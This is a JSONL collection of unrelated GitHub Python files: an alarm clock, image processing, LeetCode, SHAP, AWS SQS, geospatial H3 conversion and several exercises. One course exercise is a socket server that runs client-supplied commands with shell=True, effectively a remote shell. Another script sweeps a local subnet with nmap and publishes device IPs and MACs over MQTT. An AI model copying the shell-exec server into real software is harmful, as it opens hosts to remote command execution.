datetime.datetime.now().minute:\n for i in range(0, 1):\n kit.playonyt(\"https://www.youtube.com/watch?v=KnJ0d63Fi0c\")\n break\n\n\nl1 = Label(obj, text=\"HOURS:\")\nl2 = Label(obj, text=\"MINUTES:\")\nl1.grid(row=0, column=0)\nl2.grid(row=1, column=0)\ne1 = Entry(obj)\ne2 = Entry(obj)\ne1.grid(row=0, column=1)\ne2.grid(row=1, column=1)\nb1 = Button(obj, text=\"SET ALARM\", command=alarm)\nb1.grid(row=2, column=1)\nc1 = Combobox(obj, values=[\"AM\", \"PM\"])\nc1.grid(row=0, column=2)\nl3 = Label(obj, text=\"AM OR PM\")\nl3.grid(row=0, column=3)\nobj.mainloop()\n","repo_name":"jim923/dbt-1303_dbitlmr610521_Pythonproj","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4508718273","text":"import cv2 as cv\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef histogram_equalization(image):\n hist = cv.calcHist([image], [0], None, [256], [0, 256])\n\n hist /= hist.sum()\n cdf = np.cumsum(hist)\n cdf_normalized = (cdf - cdf.min()) * 255 / (cdf.max() - cdf.min())\n\n #For example, if image[0, 0] is 100 and cdf_normalized[100] is 150, then equalized_image[0, 0] will become 150.\n equalized_image = cdf_normalized[image]\n hist1 = cv.calcHist([equalized_image], [0], None, [256], [0, 256])\n\n return equalized_image, hist, hist1\n\nimage = cv.imread('../../Resources/1.jpg', 0)\nequalized_image, hist, hist1 = histogram_equalization(image)\n\nplt.subplot(2, 2, 1)\nplt.imshow(cv.cvtColor(image, cv.COLOR_BGR2RGB))\nplt.title('Original Image')\n\nplt.subplot(2, 2, 2)\nplt.imshow(equalized_image, cmap='gray')\nplt.title('Equalized Image')\n\nplt.subplot(2, 2, 3)\nplt.plot(hist)\nplt.title('og histogram')\n\nplt.subplot(2, 2, 4)\nplt.plot(hist1)\nplt.title('eq histogram')\n\nplt.show()\n","repo_name":"flyaltair/OpenCV","sub_path":"Mid Sem/hist_equlisation_scratch.py","file_name":"hist_equlisation_scratch.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26229440690","text":"import os\nimport glob\n\nclass DataManager:\n @classmethod\n def dropfile(cls, pattarn: str) -> None:\n file_list = glob.glob(f\"*.{pattarn}\")\n for file in file_list:\n print(\"remove:{0}\".format(file))\n os.remove(file)","repo_name":"takeru403/ipoca_salesforecast_-","sub_path":"opt/library/data_manager.py","file_name":"data_manager.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37286338678","text":"#\n# @lc app=leetcode id=764 lang=python3\n#\n# [764] Largest Plus Sign\n#\n# https://leetcode.com/problems/largest-plus-sign/description/\n#\n# algorithms\n# Medium (44.02%)\n# Likes: 298\n# Dislikes: 67\n# Total Accepted: 14.7K\n# Total Submissions: 33.3K\n# Testcase Example: '5\\n[[4,2]]'\n#\n# \n# In a 2D grid from (0, 0) to (N-1, N-1), every cell contains a 1, except those\n# cells in the given list mines which are 0. What is the largest axis-aligned\n# plus sign of 1s contained in the grid? Return the order of the plus sign.\n# If there is none, return 0.\n# \n# An \"axis-aligned plus sign of 1s of order k\" has some center grid[x][y] = 1\n# along with 4 arms of length k-1 going up, down, left, and right, and made of\n# 1s. This is demonstrated in the diagrams below. Note that there could be 0s\n# or 1s beyond the arms of the plus sign, only the relevant area of the plus\n# sign is checked for 1s.\n# \n# \n# Examples of Axis-Aligned Plus Signs of Order k:\n# Order 1:\n# 000\n# 010\n# 000\n# \n# Order 2:\n# 00000\n# 00100\n# 01110\n# 00100\n# 00000\n# \n# Order 3:\n# 0000000\n# 0001000\n# 0001000\n# 0111110\n# 0001000\n# 0001000\n# 0000000\n# \n# \n# Example 1:\n# Input: N = 5, mines = [[4, 2]]\n# Output: 2\n# Explanation:\n# 11111\n# 11111\n# 11111\n# 11111\n# 11011\n# In the above grid, the largest plus sign can only be order 2. One of them is\n# marked in bold.\n# \n# \n# Example 2:\n# Input: N = 2, mines = []\n# Output: 1\n# Explanation:\n# There is no plus sign of order 2, but there is of order 1.\n# \n# \n# Example 3:\n# Input: N = 1, mines = [[0, 0]]\n# Output: 0\n# Explanation:\n# There is no plus sign, so return 0.\n# \n# \n# Note:\n# N will be an integer in the range [1, 500].\n# mines will have length at most 5000.\n# mines[i] will be length 2 and consist of integers in the range [0, N-1].\n# (Additionally, programs submitted in C, C++, or C# will be judged with a\n# slightly smaller time limit.)\n# \n#\nclass Solution:\n def orderOfLargestPlusSign(self, N: int, mines: List[List[int]]) -> int:\n # O(N^2 + N x |mines|)\n # g = [[min(i, N-i-1, j, N-j-1) + 1 for j in range(N)] for i in range(N)]\n # for x, y in mines:\n # for i in range(N):\n # g[i][y] = min(g[i][y], abs(i-x))\n # g[x][i] = min(g[x][i], abs(i-y))\n # return max(max(row) for row in g)\n\n # O(N^2)\n banned = {tuple(mine) for mine in mines}\n dp = [[0] * N for _ in range(N)]\n ans = 0\n\n for r in range(N):\n count = 0\n for c in range(N):\n count = 0 if (r, c) in banned else count + 1\n dp[r][c] = count\n\n count = 0\n for c in range(N-1, -1, -1):\n count = 0 if (r, c) in banned else count + 1\n if count < dp[r][c]:\n dp[r][c] = count\n\n for c in range(N):\n count = 0\n for r in range(N):\n count = 0 if (r, c) in banned else count + 1\n if count < dp[r][c]:\n dp[r][c] = count\n\n count = 0\n for r in range(N-1, -1, -1):\n count = 0 if (r, c) in banned else count + 1\n if count < dp[r][c]:\n dp[r][c] = count\n\n if dp[r][c] > ans:\n ans = dp[r][c]\n\n return ans\n \n\n","repo_name":"chenxu0602/LeetCode","sub_path":"764.largest-plus-sign.py","file_name":"764.largest-plus-sign.py","file_ext":"py","file_size_in_byte":3305,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"8631509290","text":"import functions\r\n\r\n#проверяем работу функций HyberboxExpansionTest и membership и HyberboxExpansion\r\n\r\nw = [0.3, 0.3]\r\nv = [0.2, 0.2]\r\nx = [0.1, 0.1]\r\n\r\nprint(functions.HyberboxExpansionTest(w, v, x))\r\nprint(functions.membership(w, v, x))\r\n\r\nfunctions.HyberboxExpansion(w, v, x)\r\nprint( v, \" \", w)\r\n\r\n#проверяем работу функции HyperboxOverlapTestAndContraction\r\n# такой пример был в статье\r\n\r\nv1 = [0.2, 0.2]\r\nw1 = [0.5, 0.5]\r\n\r\nv2 = [0.4, 0.3]\r\nw2 = [0.6, 0.6]\r\n\r\nfunctions.HyperboxOverlapTestAndContraction(v1, w1, v2, w2)\r\n\r\n\r\nprint(v1,\" \", w1, \" \", v2, w2)\r\n\r\n","repo_name":"MichaelYashchenko/coursework","sub_path":"functiontest.py","file_name":"functiontest.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31463309221","text":"import nmap\nimport time\nimport json\nimport socket\nimport paho.mqtt.client as mqtt\n\n#Configuración de MQTT\nmqtt_broker = \"192.168.1.66\"\nmqtt_port = 1883\nmqtt_topic = \"dispositivos\"\n\n\ndef obtener_nombre_dispositivo(ip):\n try:\n nombre = socket.getfqdn(ip)\n return nombre\n except socket.error:\n return \"\"\n\n\ndef escanear_red():\n nm = nmap.PortScanner()\n nm.scan(hosts='192.168.1.0/24', arguments='-sn')\n dispositivos = []\n for host in nm.all_hosts():\n if 'mac' in nm[host]['addresses']:\n ip = nm[host]['addresses']['ipv4']\n mac = nm[host]['addresses']['mac']\n nombre = obtener_nombre_dispositivo(ip)\n dispositivos.append({\"ip\": ip, \"mac\": mac, \"nombre\": nombre})\n return dispositivos\n\n\ndef publicar_dispositivos(dispositivos):\n client = mqtt.Client()\n client.connect(mqtt_broker, mqtt_port)\n client.publish(mqtt_topic, json.dumps(dispositivos))\n client.disconnect()\n\n\nwhile True:\n try:\n dispositivos = escanear_red()\n publicar_dispositivos(dispositivos)\n print(\"Lista de dispositivos publicada en MQTT.\")\n except nmap.PortScannerError as e:\n print(\"Error al escanear la red:\", e)\n except mqtt.MQTTException as e:\n print(\"Error al publicar en MQTT:\", e)\n \n time.sleep(300) # Espera 3 minutos antes de volver a escanear la red\n","repo_name":"Jose-pe/Net_ScanMQTT","sub_path":"scaner_red_raspbianita.py","file_name":"scaner_red_raspbianita.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"29841193576","text":"\"\"\"\nРазработанный Адриелу Ванг от ДанСтат Консульти́рования\n\"\"\"\n\nimport torch\nimport itertools\nimport plotly.graph_objects as go\nimport matplotlib.pyplot as plt\n\nclass PerceptronShap:\n def __init__(self, perceptron, num_samples=1000):\n self.perceptron = perceptron\n self.num_samples = num_samples\n\n def generate_samples(self, mean, covariance_matrix):\n dist = torch.distributions.MultivariateNormal(mean, covariance_matrix)\n samples = dist.sample(sample_shape=(self.num_samples,))\n return samples\n\n def compute_shap_values_single(self, instance, num_features):\n instance = instance.reshape(1, -1)\n shap_values = torch.zeros(num_features)\n\n expected_value = torch.mean(self.perceptron.predict(instance))\n\n mean = torch.mean(instance, dim=0)\n covariance_matrix = torch.eye(num_features) * 0.1\n random_instances = self.generate_samples(mean, covariance_matrix)\n\n for i in range(num_features):\n without_feature = random_instances.clone()\n with_feature = random_instances.clone()\n with_feature[:, i] = instance[:, i]\n\n marginal_contribution = self.perceptron.predict(with_feature) - self.perceptron.predict(without_feature)\n\n shap_values[i] = torch.mean(marginal_contribution)\n\n return shap_values, expected_value\n\n def plot_shap_values(self, shap_values, feature_names, expected_value, is_plotly=False):\n shap_values = shap_values.detach().numpy()\n expected_value = expected_value.item()\n\n if is_plotly:\n fig = go.Figure(go.Bar(y=feature_names, x=shap_values, orientation='h'))\n fig.update_layout(title=f\"SHAP Values (Base value: {expected_value:.2f})\")\n fig.show()\n else:\n plt.barh(feature_names, shap_values)\n plt.title(f\"SHAP Values (Base value: {expected_value:.2f})\")\n plt.show()\n\n def compute_shap_values(self, instances, num_features):\n shap_values_list = []\n expected_value_list = []\n\n for instance in instances:\n shap_values, expected_value = self.compute_shap_values_single(instance.reshape(1, -1), num_features)\n shap_values_list.append(shap_values)\n expected_value_list.append(expected_value)\n\n return shap_values_list, expected_value_list\n\n def plot_aggregated_shap_values(self, shap_values_list, feature_names, expected_value_list, is_plotly=False):\n aggregated_shap_values = torch.mean(torch.stack(shap_values_list), axis=0)\n mean_expected_value = torch.mean(torch.stack(expected_value_list))\n\n aggregated_shap_values = aggregated_shap_values.detach().numpy()\n mean_expected_value = mean_expected_value.item()\n\n if is_plotly:\n fig = go.Figure(go.Bar(y=feature_names, x=aggregated_shap_values.tolist(), orientation='h'))\n fig.update_layout(title=f\"Aggregated SHAP Values (Mean base value: {mean_expected_value:.2f})\")\n fig.show()\n else:\n plt.barh(feature_names, aggregated_shap_values)\n plt.title(f\"Aggregated SHAP Values (Mean base value: {mean_expected_value:.2f})\")\n plt.show()\n\n","repo_name":"datstat-consulting/DeepLearningEconometrics","sub_path":"PerceptronShap.py","file_name":"PerceptronShap.py","file_ext":"py","file_size_in_byte":3269,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"5940656381","text":"import os\nfrom time import sleep\n\nfontdir = '/usr/share/figlet'\nfor item in os.listdir(fontdir):\n\ttype = str(item)[-2:]\n\tif type == 'lf': #'tlf' or type == 'flf'\n\t\tfont = item[:-4]\n\t\tprint(f'Font: {font}\\n')\n\t\tos.system('figlet -t -f '+font+' '+font)\n\t\tprint('\\n'+'='*20)\n\t\tsleep(0.5)\n","repo_name":"VicerExciser/BrewMenu","sub_path":"fig_fonts_display.py","file_name":"fig_fonts_display.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24796375644","text":"import os\nos.add_dll_directory(r\"C:\\Program Files\\NVIDIA GPU Computing Toolkit\\CUDA\\v11.1\\bin\")\nfrom jax.config import config\nconfig.update('jax_platform_name', 'cpu')\nconfig.update(\"jax_enable_x64\", True)\nimport jax.numpy as jnp\nfrom qdc import AutoGradCircuit\n\ndef test_ghz():\n qubits_number = 21 # number of qubits in a circuit\n\n # cnot gate\n cnot = jnp.array([1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 1, 0], dtype=jnp.complex128)\n hadamard = jnp.array([1, 1, 1, -1], dtype=jnp.complex128) * (1 / jnp.sqrt(2))\n\n c = AutoGradCircuit(qubits_number)\n\n c.add_q1_const_gate(0)\n for i in range(qubits_number-1):\n c.get_q2_dens_op_with_grad(i, i+1)\n for i in range(qubits_number):\n c.get_q1_dens_op_with_grad(i)\n for i in range(qubits_number-1):\n c.add_q2_const_gate(i, i+1)\n for i in range(qubits_number):\n c.get_q1_dens_op(i)\n for i in range(qubits_number-1):\n c.get_q2_dens_op(i, i+1)\n\n simple_run, autodiff_run = c.build()\n\n all_density_matrices = simple_run([], [hadamard] + (qubits_number - 1) * [cnot])\n autodiff_density_matrices = autodiff_run([], [hadamard] + (qubits_number - 1) * [cnot])\n assert(len(all_density_matrices) == 2 * qubits_number + 2 * (qubits_number - 1))\n assert(len(autodiff_density_matrices) == qubits_number + (qubits_number - 1))\n for lhs, rhs in zip(all_density_matrices[:qubits_number + (qubits_number - 1)], autodiff_density_matrices):\n assert(jnp.isclose(lhs, rhs).all())\n\n first_psi = jnp.tensordot(jnp.array([1 / jnp.sqrt(2), 1 / jnp.sqrt(2)]), jnp.array([1., 0.]), axes=0).reshape((4,))\n first_dens = jnp.tensordot(first_psi, first_psi.conj(), axes=0).reshape((4, 4))\n assert(jnp.isclose(first_dens, all_density_matrices[0]).all())\n\n second_dens = jnp.array([[1, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0]])\n for dens in all_density_matrices[1:(qubits_number-1)]:\n assert(jnp.isclose(dens, second_dens).all())\n\n superposition_dens = jnp.array([[0.5, 0.5], [0.5, 0.5]])\n assert(jnp.isclose(superposition_dens, all_density_matrices[(qubits_number-1)]).all())\n\n up_spin_dens = jnp.array([[1, 0], [0, 0]])\n for dens in all_density_matrices[qubits_number:(2 * qubits_number - 1)]:\n assert(jnp.isclose(dens, up_spin_dens).all())\n \n one_qubit_mixed = jnp.array([[0.5, 0.], [0., 0.5]])\n for dens in all_density_matrices[(2 * qubits_number - 1):(3 * qubits_number - 1)]:\n assert(jnp.isclose(dens, one_qubit_mixed).all())\n\n two_qubit_partial_mixed = jnp.array([[0.5, 0., 0., 0.], [0., 0., 0., 0.], [0., 0., 0., 0.], [0., .0, 0., 0.5]])\n for dens in all_density_matrices[(3 * qubits_number - 1):]:\n assert(jnp.isclose(dens, two_qubit_partial_mixed).all())\n","repo_name":"LuchnikovI/Differentiable-quantum-circuit-cuda","sub_path":"src/test_ghz.py","file_name":"test_ghz.py","file_ext":"py","file_size_in_byte":2651,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"7597031946","text":"import boto3\nimport json\nimport pandas as pd\nimport time\nfrom collections import defaultdict\n\nsqs = boto3.client('sqs')\n\n\ndef read_experiment_from_queue(queue_url, experiments_dir, num_experiments=1):\n \"\"\"\n Reads experiments from queue, writes them to csv files\n Parameters\n ----------\n queue_url : string\n The url of the aws queue\n experiments_dir : string\n The directory where the csv files will be saved\n num_experiments : int\n Number of messages to download\n\n Returns\n ----------\n string\n Path of the produced csv string, or None if there are no experiments\n left on the queue.\n \"\"\"\n # Retrieving experiments\n response = sqs.receive_message(\n QueueUrl=queue_url,\n AttributeNames=[\n 'experiment_name',\n 'experiment_group',\n 'experiment_header'\n ],\n MaxNumberOfMessages=num_experiments,\n MessageAttributeNames=[\n 'All'\n ],\n VisibilityTimeout=100,\n WaitTimeSeconds=0\n )\n messages = response.get('Messages')\n\n if messages is None:\n print(\"No messages on queue\")\n return None\n\n print(\"I have retrieved {0} messages\".format(len(messages)))\n\n experiment_groups = defaultdict(list)\n\n # Getting important information from the experiments\n for message in messages:\n experiment = {\n \"experiment\": message[\"Body\"],\n \"name\": message[\"MessageAttributes\"][\"experiment_name\"][\n \"StringValue\"],\n \"experiment_group\": message[\"MessageAttributes\"][\n \"experiment_group\"][\"StringValue\"],\n \"experiment_header\": message[\"MessageAttributes\"][\n \"experiment_header\"][\"StringValue\"]\n }\n\n experiment_groups[experiment[\"experiment_group\"]].append(experiment)\n\n experiment_group_names = experiment_groups.keys()\n\n print(\"There are {0} experiment groups in this batch, each will be \"\n \"written to a separate file\".format(len(experiment_group_names)))\n\n for egn in experiment_group_names:\n experiments = experiment_groups[egn]\n # Writing experiment to file\n experiment_group = experiments[0][\"experiment_group\"]\n experiment_header = experiments[0][\"experiment_header\"].split(\",\")\n\n experiments_row = [e[\"experiment\"].split(\",\") for e in experiments]\n\n experiments_df = pd.DataFrame(experiments_row,\n columns=experiment_header)\n\n output_path = \"{0}/{1}_{2}.csv\".format(experiments_dir,\n experiment_group, time.time())\n\n print(\"Writing to {0}\".format(output_path))\n experiments_df.to_csv(output_path, index=False)\n\n print(\"Deleting from queue\")\n\n for message in messages:\n receipt = message['ReceiptHandle']\n\n sqs.delete_message(\n QueueUrl=queue_url,\n ReceiptHandle=receipt\n )\n\n return output_path\n\n\nif __name__ == \"__main__\":\n with open(\"../config.json\", \"r\") as f:\n config = json.load(f)\n f.close()\n\n queue_url = config[\"aws\"][\"experiments_queue\"]\n read_experiment_from_queue(queue_url, \".\", num_experiments=1)\n","repo_name":"DarioPanada/warburg-investigation","sub_path":"aws/ExperimentReader.py","file_name":"ExperimentReader.py","file_ext":"py","file_size_in_byte":3240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7768312316","text":"numeros = [1,2,3,4,5,6,7,8,9]\n\ndef unaFuncionCualquiera( lista ):\n conteo = 0 # O(1)\n for numero1 in lista:\n for numero2 in lista:\n print(numero1 , numero2 ) #O(n^2)\n conteo += 1 #O(n^2)\n return conteo\n # O(1 + 2n^2)\n\nconteo = unaFuncionCualquiera(numeros)\n\nprint( \"Final:\" , conteo)","repo_name":"AdrianDali/diseno_analisis_de_algoritmos","sub_path":"Septiembre_20/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36318363702","text":"#num = int(input(\"Enter the No.\"))\r\n#if num<5:\r\n # print(\"num is less than 5\")\r\n\r\n#name=input(\"Enter your name\")\r\n#if name==\"Haseeb\" or name==\"haseeb\":\r\n # print(\"Thats me\")\r\n#else:\r\n # print(\"its not me\")\r\ncond = True\r\nif type(cond)== bool:\r\n print(\"it is true\")\r\nelse :\r\n print(\"it is false\")","repo_name":"uhaseeb/python-practice","sub_path":"ifelse.py","file_name":"ifelse.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23420741835","text":"import os\nimport re\n\ndef maxfiles ():\n numfiles = 0\n name = ''\n for root, dirs, files in os.walk('.'):\n if len (files) > numfiles:\n numfiles = len (files)\n name = re.sub(r'.*/', '', root)\n print ('Больше всего файлов в папке:', name) \n \nmaxfiles ()\n","repo_name":"brouhahaha/programming_1","sub_path":"hw13/oswalk.py","file_name":"oswalk.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1547977842","text":"string = input(\"Enter String :- \")\ndiv = int(input(\"Enter Separator :- \"))\nk,l = div,[]\nfor i in range(div):\n l.append(list(string[:k]))\n string = string[k:]\nl2 = []\nfor i in l:\n for j in i:\n if i.count(j) >= 2:\n i.remove(j)\n break\n \n l2.append(\"\".join(i)) \n\nfor i in l2:\n print(i)\n\n# # print(l)\n# n = int(input())\n# s = set()\n# for i in range(n):\n# # name = input()\n# s.add(input())\n\n# print(len(s))\n","repo_name":"Pyk017/Python","sub_path":"Python_VSCode/MergeTheToolsHackerrank.py","file_name":"MergeTheToolsHackerrank.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"72088688165","text":"import pygame\r\nimport Projectiles\r\n\r\nprojectiles = Projectiles.Projectiles()\r\n\r\nclass Gameplay():\r\n\r\n def __init__(self):\r\n self.level = 30\r\n self.level_finished = False\r\n self.balloon_entity_position = [False, False, False, False]\r\n self.bep = self.balloon_entity_position\r\n self.lives = 1\r\n\r\n def gameplay(self):\r\n pass\r\n\r\n def life(self, bpos, ppos):\r\n self.bep[0] = bpos[0]\r\n self.bep[1] = bpos[1]\r\n self.bep[2] = bpos[0]+75\r\n self.bep[3] = bpos[1]+190\r\n\r\n for data in ppos:\r\n if self.bep[0] <= data[1] <= self.bep[2] and self.bep[1] <= data[2] <= self.bep[3]:\r\n self.lives -= 1\r\n \r\n def lvlf(self, plist):\r\n if self.lives > 0:\r\n if not len(plist):\r\n self.level_finished = True\r\n \r\n if self.level_finished:\r\n self.level += 1\r\n self.level_finished = False\r\n ","repo_name":"avetsu/balloon","sub_path":"Gameplay.py","file_name":"Gameplay.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"42809634982","text":"import socket\nimport struct\nimport subprocess\n# subprocess模块来实现对系统命令或脚本的控制\nip_port = ('127.0.0.1',8080)\nserver_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\nserver_socket.bind(ip_port)\nserver_socket.listen(5)\nwhile True:\n conn,addr = server_socket.accept()\n while True:\n client_data = conn.recv(1024).decode('utf-8')\n res = subprocess.Popen(client_data,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE)\n # stdin标准输入;stdout输出,stderr错误句柄\n stdout = res.stdout.read()\n stderr = res.stderr.read()\n\n # print('stdout', stdout, type(stdout)) # b'' 二进制模式\n # print('stderr', stderr, type(stderr)) # b'' 二进制模式\n\n # stdin = res.stdin.read()\n # 先发报头 ---- struct\n header = struct.pack('i',len(stdout+stderr))\n conn.send(header)\n conn.send(stdout)\n conn.send(stderr)\n conn.close()\n\n\n\n\n\n\n","repo_name":"foremostxiao/d","sub_path":"luffy/第三模块/第6章网络编程/第6章每小节/8 练习题/tcp-ssm/服务端.py","file_name":"服务端.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39468302677","text":"class Constants:\n def __init__(self):\n self.pir_pin = 4\n self.videotype = \"mp4\"\n self.imagetype = \"jpg\"\n \n self.webroot = \"/var/www/html/\"\n self.video_folder = self.webroot + \"video/\"\n self.app_folder_web = \"/\"\n self.video_folder_web = self.app_folder_web + \"video/\"\n self.backup_register = \"resource/backup-register\"\n \n self.go = \"go\"\n self.stop = \"stop\"\n self.photo = \"photo\"\n self.video = \"video\"\n self.live_video = \"livevideo\"\n \n self.settings = \"settings\"\n self.brightness = \"brightness\"\n self.contrast = \"contrast\"\n self.iso = \"iso\"\n self.exposure_mode = \"mode\"\n \n self.msg = \"msg\"\n self.stat = \"status\"\n self.host = '' # Symbolic name, meaning all available interfaces\n self.port = 8888 # Arbitrary non-privileged port \n","repo_name":"slepeweb/java-sandbox","sub_path":"slepeweb-misc/script/secam/py/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7672107334","text":"import logging\nimport multiprocessing\nfrom functools import partial\nfrom io import StringIO\nfrom pathlib import Path\n\nimport click\nimport h3ronpy.raster\nimport pandas as pd\nimport psycopg\nimport rasterio as rio\nfrom psycopg import sql\nfrom rasterio import DatasetReader\n\nfrom utils import DTYPES_TO_PG, slugify, snakify, get_connection_info\n\nlogging.basicConfig(level=logging.INFO)\nlog = logging.getLogger(\"raster_to_h3\")\n# we don't want to see the botocore logs that somehow pop up. I have no clue where they come from\nlogging.getLogger(\"botocore.credentials\").setLevel(logging.WARNING)\n\n\ndef check_srs(reference_raster: DatasetReader, raster: DatasetReader):\n \"\"\"Checks that raster has same projection as reference\"\"\"\n if reference_raster.crs != raster.crs:\n message = (\n f\"Raster files have different CRS: {reference_raster.name} {reference_raster.crs} \"\n f\"vs {raster.name} {raster.crs}\"\n )\n log.error(message)\n raise ValueError(message)\n\n\ndef check_transform(reference_raster: DatasetReader, raster: DatasetReader):\n \"\"\"Checks that raster has same transform as reference\"\"\"\n if reference_raster.transform != raster.transform:\n message = (\n f\"Raster files have different Transform: {reference_raster.name} {reference_raster.transform} \"\n f\"vs {raster.name} {raster.transform}\"\n )\n log.error(message)\n raise ValueError(message)\n\n\ndef raster_to_h3(reference_raster: Path, h3_resolution: int, raster_file: Path) -> pd.DataFrame:\n \"\"\"Convert a raser to a dataframe with h3index -> value\n\n Uses `h3ronpy.raster.raster_to_dataframe()` which uses already multiprocessing under the hood\n so there's no need to iterate over the raster windows anymore.\n \"\"\"\n log.info(f\"Converting {raster_file.name} to H3 dataframe\")\n with rio.open(raster_file) as raster:\n with rio.open(reference_raster) as ref:\n check_srs(ref, raster)\n check_transform(ref, raster)\n\n h3 = h3ronpy.raster.raster_to_dataframe(\n raster.read(1),\n transform=raster.transform,\n nodata_value=raster.nodata,\n h3_resolution=h3_resolution,\n compacted=False,\n geo=False,\n ).set_index(\"h3index\")\n # we need the h3 index in the hexadecimal form for the DB\n h3.index = pd.Series(h3.index).apply(lambda x: hex(x)[2:])\n return h3.rename(columns={\"value\": slugify(Path(raster.name).stem)})\n\n\ndef create_h3_grid_table(connection: psycopg.Connection, table: str, df: pd.DataFrame):\n index = [sql.SQL(\"h3index h3index PRIMARY KEY\")]\n extra = [\n sql.SQL(\"{} {}\").format(sql.Identifier(col), sql.SQL(DTYPES_TO_PG[str(dtype)]))\n for col, dtype in zip(df.columns, df.dtypes)\n ]\n schema = sql.SQL(\", \").join(index + extra)\n with connection.cursor() as cur:\n cur.execute(sql.SQL(\"DROP TABLE IF EXISTS {}\").format(sql.Identifier(table)))\n query = sql.SQL(\"CREATE TABLE {} ({})\").format(sql.Identifier(table), schema)\n log.info(f\"Creating table {table}\")\n cur.execute(query)\n\n\ndef write_data_to_h3_grid_table(connection: psycopg.Connection, table: str, data: pd.DataFrame):\n with connection.cursor() as cur:\n log.info(f\"Writing H3 data to {table}\")\n with StringIO() as buffer:\n data.to_csv(buffer, na_rep=\"NULL\", header=False)\n buffer.seek(0)\n copy_query = sql.SQL(\"COPY {} FROM STDIN DELIMITER ',' CSV NULL 'NULL';\").format(sql.Identifier(table))\n with cur.copy(copy_query) as copy:\n copy.write(buffer.read())\n\n\ndef clean_before_insert(connection: psycopg.Connection, table: str):\n with connection.cursor() as cur:\n cur.execute(\n 'DELETE FROM \"material_to_h3\" WHERE \"h3DataId\" IN (SELECT id FROM \"h3_data\" WHERE \"h3tableName\" = %s);',\n (table,),\n )\n cur.execute('delete from \"h3_data\" where \"h3tableName\" = %s', (table,))\n\n\ndef insert_to_h3_master_table(\n connection: psycopg.Connection, table: str, df: pd.DataFrame, h3_res: int, year: int, data_type: str, dataset: str\n):\n with connection.cursor() as cur:\n log.info(f\"Inserting data for {table} into h3_data master table.\")\n for column_name in df.columns:\n cur.execute(\n 'INSERT INTO \"h3_data\" (\"h3tableName\", \"h3columnName\", \"h3resolution\", \"year\")'\n \"VALUES (%s, %s, %s, %s)\",\n (table, column_name, h3_res, year),\n )\n if data_type == \"indicator\":\n update_for_indicator(cur, dataset, column_name)\n elif data_type == \"material_indicator\":\n update_for_indicator(cur, dataset, column_name)\n try:\n update_for_material_indicator(cur, dataset, column_name)\n except ValueError:\n log.warning(f\"Failed to update material_indicator for {column_name}\")\n continue\n elif data_type in [\"production\", \"harvest_area\"]:\n update_for_material(cur, dataset, column_name, data_type)\n\n\ndef update_for_material_indicator(cursor: psycopg.Cursor, dataset: str, column_name: str):\n cursor.execute('select id from \"indicator\" where \"nameCode\" = %s', (dataset,))\n indicator_id = cursor.fetchone()\n if not indicator_id:\n log.warning(f\"Indicator with 'nameCode' {dataset} does not exists\")\n raise ValueError(f\"Indicator with 'nameCode' {dataset} does not exists\")\n # todo: convert to script parameter or something that is not hardcoded for a specific case.\n spam_id = f\"spam_{column_name.split('PerTProduction')[0].lower()}\" # something like 'spam_ocerwhea'\n cursor.execute('select id from material where \"datasetId\" = %s', (spam_id,))\n material_ids = cursor.fetchall()\n if not material_ids:\n log.warning(f\"Material with 'datasetId' {spam_id} does not exists\")\n raise ValueError(f\"Material with 'datasetId' {spam_id} does not exists\")\n\n cursor.execute('select id from h3_data where \"h3columnName\" = %s', (column_name,))\n h3_data_id = cursor.fetchone()\n if not h3_data_id:\n log.warning(f\"h3_data with 'h3columnName' {column_name} does not exists\")\n raise ValueError(f\"h3_data with 'h3columnName' {column_name} does not exists\")\n\n # one spam dataset can have multiple materials, so we need to update all of them\n for material_id in material_ids:\n cursor.execute('delete from material_indicator_to_h3 where \"materialId\" = %s', (material_id[0],))\n cursor.execute(\n \"\"\"\n insert into material_indicator_to_h3 (\"materialId\", \"indicatorId\", \"h3DataId\")\n values (%s, %s, %s);\n \"\"\",\n (material_id[0], 